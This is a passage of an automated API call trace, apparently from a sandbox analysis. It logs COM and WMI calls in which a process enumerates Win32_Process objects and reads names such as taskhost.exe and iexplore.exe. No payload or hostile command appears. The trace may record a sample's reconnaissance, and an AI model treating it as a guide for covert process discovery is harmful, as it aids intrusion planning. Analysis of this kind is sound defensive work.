Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0223.743] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0223.743] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0223.743] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0223.744] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e89150) returned 0x0 [0223.744] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89150, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0223.744] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89150, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x768eb8) returned 0x0 [0223.744] WbemDefPath:IUnknown:Release (This=0x5e89150) returned 0x0 [0223.744] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x768eb8) returned 0x0 [0223.745] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0223.745] WbemDefPath:IUnknown:AddRef (This=0x768eb8) returned 0x3 [0223.745] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0223.745] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0223.745] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e89160) returned 0x0 [0223.745] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89160, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0223.745] WbemDefPath:IUnknown:Release (This=0x5e89160) returned 0x3 [0223.745] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0223.745] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0223.746] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0223.746] WbemDefPath:IUnknown:Release (This=0x768eb8) returned 0x2 [0223.746] WbemDefPath:IUnknown:Release (This=0x768eb8) returned 0x1 [0223.746] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0223.746] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0223.746] WbemDefPath:IUnknown:QueryInterface (in: This=0x768eb8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x768eb8) returned 0x0 [0223.746] WbemDefPath:IUnknown:AddRef (This=0x768eb8) returned 0x3 [0223.746] WbemDefPath:IUnknown:Release (This=0x768eb8) returned 0x2 [0223.746] WbemDefPath:IWbemPath:SetText (This=0x768eb8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1288\"") returned 0x0 [0223.746] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0223.746] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0223.746] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.747] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0223.747] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0223.747] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.747] IWbemClassObject:Get (in: This=0x5e86310, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e08d0*=0, plFlavor=0x26e08d4*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="taskhost.exe", varVal2=0x0), pType=0x26e08d0*=8, plFlavor=0x26e08d4*=0) returned 0x0 [0223.747] SysStringByteLen (bstr="taskhost.exe") returned 0x18 [0223.747] SysStringByteLen (bstr="taskhost.exe") returned 0x18 [0223.747] IWbemClassObject:Get (in: This=0x5e86310, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e08d0*=8, plFlavor=0x26e08d4*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="taskhost.exe", varVal2=0x0), pType=0x26e08d0*=8, plFlavor=0x26e08d4*=0) returned 0x0 [0223.747] SysStringByteLen (bstr="taskhost.exe") returned 0x18 [0223.747] SysStringByteLen (bstr="taskhost.exe") returned 0x18 [0223.747] CoTaskMemAlloc (cb=0x4) returned 0x5e89190 [0223.747] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89190, puReturned=0x26dde18 | out: apObjects=0x5e89190*=0x5e94d28, puReturned=0x26dde18*=0x1) returned 0x0 [0223.748] IUnknown:QueryInterface (in: This=0x5e94d28, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5e94d28) returned 0x0 [0223.749] IUnknown:QueryInterface (in: This=0x5e94d28, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0223.749] IUnknown:QueryInterface (in: This=0x5e94d28, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0223.749] IUnknown:AddRef (This=0x5e94d28) returned 0x3 [0223.749] IUnknown:QueryInterface (in: This=0x5e94d28, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0223.749] IUnknown:QueryInterface (in: This=0x5e94d28, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0223.749] IUnknown:QueryInterface (in: This=0x5e94d28, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5e94d2c) returned 0x0 [0223.749] IMarshal:GetUnmarshalClass (in: This=0x5e94d2c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0223.749] IUnknown:Release (This=0x5e94d2c) returned 0x3 [0223.749] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0223.749] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0223.749] IUnknown:QueryInterface (in: This=0x5e94d28, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0223.750] IUnknown:Release (This=0x5e94d28) returned 0x2 [0223.750] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0223.750] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0223.750] IUnknown:QueryInterface (in: This=0x5e94d28, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5e94d28) returned 0x0 [0223.750] IUnknown:AddRef (This=0x5e94d28) returned 0x4 [0223.750] IUnknown:Release (This=0x5e94d28) returned 0x3 [0223.750] IUnknown:Release (This=0x5e94d28) returned 0x2 [0223.750] CoTaskMemFree (pv=0x5e89190) [0223.750] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0223.750] IUnknown:AddRef (This=0x5e94d28) returned 0x3 [0223.750] IWbemClassObject:Get (in: This=0x5e94d28, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0223.751] IWbemClassObject:Get (in: This=0x5e94d28, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2052\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0223.751] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2052\"") returned 0x66 [0223.751] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2052\"") returned 0x66 [0223.751] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0223.751] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0223.751] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0223.751] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0223.752] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e89190) returned 0x0 [0223.752] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89190, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0223.753] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89190, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x768dd8) returned 0x0 [0223.753] WbemDefPath:IUnknown:Release (This=0x5e89190) returned 0x0 [0223.753] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x768dd8) returned 0x0 [0223.753] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0223.753] WbemDefPath:IUnknown:AddRef (This=0x768dd8) returned 0x3 [0223.753] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0223.753] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0223.753] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e891a0) returned 0x0 [0223.753] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e891a0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0223.753] WbemDefPath:IUnknown:Release (This=0x5e891a0) returned 0x3 [0223.753] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0223.754] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0223.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0223.754] WbemDefPath:IUnknown:Release (This=0x768dd8) returned 0x2 [0223.754] WbemDefPath:IUnknown:Release (This=0x768dd8) returned 0x1 [0223.754] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0223.754] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0223.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x768dd8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x768dd8) returned 0x0 [0223.754] WbemDefPath:IUnknown:AddRef (This=0x768dd8) returned 0x3 [0223.754] WbemDefPath:IUnknown:Release (This=0x768dd8) returned 0x2 [0223.754] WbemDefPath:IWbemPath:SetText (This=0x768dd8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2052\"") returned 0x0 [0223.754] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0223.754] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0223.754] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.754] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0223.754] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0223.754] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.754] IWbemClassObject:Get (in: This=0x5e94d28, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e1144*=0, plFlavor=0x26e1148*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x26e1144*=8, plFlavor=0x26e1148*=0) returned 0x0 [0223.755] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0223.755] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0223.755] IWbemClassObject:Get (in: This=0x5e94d28, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e1144*=8, plFlavor=0x26e1148*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="iexplore.exe", varVal2=0x0), pType=0x26e1144*=8, plFlavor=0x26e1148*=0) returned 0x0 [0223.755] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0223.755] SysStringByteLen (bstr="iexplore.exe") returned 0x18 [0223.755] CoTaskMemAlloc (cb=0x4) returned 0x5e891d0 [0223.755] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e891d0, puReturned=0x26dde18 | out: apObjects=0x5e891d0*=0x5e89a70, puReturned=0x26dde18*=0x1) returned 0x0 [0223.838] IUnknown:QueryInterface (in: This=0x5e89a70, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5e89a70) returned 0x0 [0223.838] IUnknown:QueryInterface (in: This=0x5e89a70, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0223.838] IUnknown:QueryInterface (in: This=0x5e89a70, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0223.838] IUnknown:AddRef (This=0x5e89a70) returned 0x3 [0223.838] IUnknown:QueryInterface (in: This=0x5e89a70, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0223.838] IUnknown:QueryInterface (in: This=0x5e89a70, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0223.838] IUnknown:QueryInterface (in: This=0x5e89a70, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5e89a74) returned 0x0 [0223.838] IMarshal:GetUnmarshalClass (in: This=0x5e89a74, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0223.839] IUnknown:Release (This=0x5e89a74) returned 0x3 [0223.839] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0223.839] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0223.839] IUnknown:QueryInterface (in: This=0x5e89a70, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0223.839] IUnknown:Release (This=0x5e89a70) returned 0x2 [0223.839] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0223.839] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0223.839] IUnknown:QueryInterface (in: This=0x5e89a70, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5e89a70) returned 0x0 [0223.839] IUnknown:AddRef (This=0x5e89a70) returned 0x4 [0223.839] IUnknown:Release (This=0x5e89a70) returned 0x3 [0223.839] IUnknown:Release (This=0x5e89a70) returned 0x2 [0223.839] CoTaskMemFree (pv=0x5e891d0) [0223.839] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0223.839] IUnknown:AddRef (This=0x5e89a70) returned 0x3 [0223.840] IWbemClassObject:Get (in: This=0x5e89a70, wszName="__GENUS", lFlags=0, 